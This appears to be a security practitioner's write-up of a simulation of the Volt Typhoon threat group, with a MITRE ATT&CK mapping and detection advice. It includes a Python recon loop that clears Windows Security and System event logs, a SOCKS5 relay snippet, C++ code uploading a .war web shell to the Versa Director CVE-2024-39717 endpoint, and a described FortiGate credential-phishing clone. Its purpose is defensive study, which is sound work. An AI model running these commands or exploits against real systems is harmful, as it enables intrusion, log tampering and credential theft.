Volt Typhoon

Origin: China (PRC) — State-Sponsored

Aliases: BRONZE SILHOUETTE, Vanguard Panda, DEV-0391, Insidious Taurus

Active Since: Mid-2021 (publicly attributed May 2023)

Targets: US Critical Infrastructure — Communications, Energy, Water, Transportation

Focus Areas: Living off the Land, Pre-positioning, SOHO Device Exploitation

Overview

FBI Director Christopher Wray called Volt Typhoon "the defining threat of our generation." Unlike ransomware groups or data thieves, Volt Typhoon has a single goal: quietly embed themselves inside US critical infrastructure networks and wait. No data exfiltration, no ransom notes — just pre-positioned access that can be activated during a geopolitical crisis.

What makes them genuinely different from every other APT is their discipline. They use zero custom malware. Every action is performed through built-in operating system tools — cmd.exe, wmic, netsh, PowerShell. There are no IOCs to signature on. This forced me to fundamentally rethink how detection works when every artifact looks exactly like legitimate admin activity.

MITRE ATT&CK Mapping

Tactic Technique Simulation Tool
Initial Access T1190 — Exploit Public-Facing Application (Versa Director CVE-2024-39717) versa_director_exploit.cpp
Initial Access T1566.002 — Spearphishing Link (FortiGate VPN credential phishing) fortigate_phish/
Execution T1059.001 — PowerShell (LOTL discovery commands) lotl_discovery.ps1
Discovery T1082 / T1049 / T1016 — System, Network, and Config Discovery lotl_recon.py
Command & Control T1090.002 — SOCKS5 Proxy via KV-Botnet kv_botnet_proxy.py
Defense Evasion T1562.001 — Disable Security Tools (wevtutil log clearing) lotl_recon.py

Living off the Land: The Recon Module

The simulation's recon module calls the exact same binaries a sysadmin would use — systeminfo, netstat, ipconfig, wevtutil, wmic. There's nothing to detect based on the individual commands. But the pattern matters: running systeminfo, then immediately dumping the DNS cache, then querying security products via WMI, then clearing specific event logs — that behavioral sequence is what detection has to key on.

recon_commands = [ ("systeminfo", "System information"), ("ipconfig /all", "Network configuration"), ("netstat -ano", "Active connections"), ("net user", "Local user accounts"), ("net localgroup administrators", "Admin group members"), ("wmic process list brief", "Running processes"), ("wmic service list brief", "Installed services"), ("netsh advfirewall show allprofiles", "Firewall status"), ("wevtutil cl Security", "Clear security logs"), # Defense evasion ("wevtutil cl System", "Clear system logs"), ] for cmd, description in recon_commands: result = subprocess.run(cmd, capture_output=True, text=True, shell=True) exfil_data[description] = result.stdout[:2000]

Building this taught me why behavioral detection (UEBA) is essential for LOTL threats. Traditional SIEM rules that alert on individual commands would fire on every sysadmin doing morning checks. You need temporal correlation — a rule that triggers when 5+ native discovery commands run in sequence within 60 seconds from the same session, especially combined with log clearing.

KV-Botnet: SOCKS5 Proxy Infrastructure

Volt Typhoon routes all C2 traffic through compromised SOHO routers — Cisco RV320s, Netgear ProSAFEs, DrayTek Vigor devices. They deployed the KV-Botnet, which turns these routers into SOCKS5 proxy nodes. The traffic appears to originate from a legitimate small business router, making it nearly impossible to block by IP reputation.

I implemented a full RFC 1928 SOCKS5 proxy to understand how this works at the protocol level. The three-phase handshake is straightforward but the details were revealing:

# Phase 1: Client greeting — advertise supported auth methods # VER (0x05 = SOCKS5) | NMETHODS | METHOD_LIST greeting = struct.pack('!BBB', 0x05, 0x01, 0x00) # 1 method: no auth # Phase 2: Server selects method ver, method = struct.unpack('!BB', response[:2]) # Phase 3: Connection request # VER | CMD | RSV | ATYPE | DST.ADDR | DST.PORT ver, cmd, rsv, atype = struct.unpack('!BBBB', header[:4]) if atype == 0x01: # IPv4 — 4 bytes addr = socket.inet_ntoa(self.request.recv(4)) elif atype == 0x03: # Domain name — variable length domain_len = self.request.recv(1)[0] addr = self.request.recv(domain_len).decode() elif atype == 0x04: # IPv6 — 16 bytes addr = socket.inet_ntop(socket.AF_INET6, self.request.recv(16)) port = struct.unpack('!H', self.request.recv(2))[0] # Establish upstream connection and begin bidirectional relay remote = socket.create_connection((addr, port)) self._relay_traffic(self.request, remote)

The key insight: when you're a network defender and you see SOCKS5 traffic coming from a legitimate edge device, there's nothing inherently suspicious about it. You need to correlate traffic patterns — long-lived tunnel sessions with periodic low-volume beaconing — and cross-reference with threat feeds tracking known compromised SOHO devices. This is exactly why CISA pushed the "Secure by Design" initiative for router manufacturers.

Versa Director CVE-2024-39717

In mid-2024, Volt Typhoon exploited a zero-day in Versa Director — the management platform used by ISPs and MSPs to orchestrate SD-WAN infrastructure. The vulnerability was in an unrestricted file upload endpoint in the /vnms/devicereg/uploadFileToDevice path. By uploading a specially crafted Java servlet (a .war file containing a web shell), they gained code execution on the management server — which controls the entire SD-WAN fabric.

The C++ exploit simulation crafts the multipart HTTP request, uploads the malicious servlet, and interacts with the resulting web shell. What made this attack devastating wasn't the technical complexity — it was the target selection. Compromising a Versa Director instance gave them access to every downstream network managed through that SD-WAN.

// Construct multipart form data for .war file upload std::string boundary = "----WebKitFormBoundary" + generate_random(16); std::string body = "--" + boundary + "\r\n" "Content-Disposition: form-data; name=\"file\"; " "filename=\"updates.war\"\r\n" "Content-Type: application/octet-stream\r\n\r\n" + war_payload + "\r\n--" + boundary + "--\r\n"; // Upload to unrestricted endpoint curl_easy_setopt(curl, CURLOPT_URL, "https://target:9183/vnms/devicereg/uploadFileToDevice"); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, body.c_str());

FortiGate VPN Credential Phishing

Volt Typhoon also uses targeted credential phishing against network administrators. The simulation includes a pixel-perfect clone of the FortiGate SSL-VPN login portal, complete with proper CSS, the Fortinet logo, and JavaScript validation. Captured credentials are logged server-side and the victim is redirected to the real VPN portal with a "session expired" message — they log in again on the real page and never realize anything happened.

This technique is effective because VPN login pages are inherently expected by users. A typosquat domain like vpn-fortinet-corp.com sent from a spoofed IT department email is all it takes. The simulation demonstrates why MFA on VPN infrastructure is non-negotiable.

Detection Guidance

Key Challenge: Volt Typhoon generates zero malware artifacts. Detection must be entirely behavioral — command sequence analysis, anomalous SOCKS5 tunnels from edge devices, and correlation of admin tool usage with threat intelligence on compromised SOHO infrastructure.

What to hunt for:

1. Multiple native discovery commands (systeminfo, netstat, wmic) executed in rapid succession from a single session
2. Event log clearing (wevtutil cl) following reconnaissance activity
3. Long-duration SOCKS5 connections from SOHO devices to internal infrastructure
4. Unusual inbound connections to SD-WAN management platforms
5. VPN authentication attempts from IPs associated with residential proxy networks

Full simulation code available on GitHub.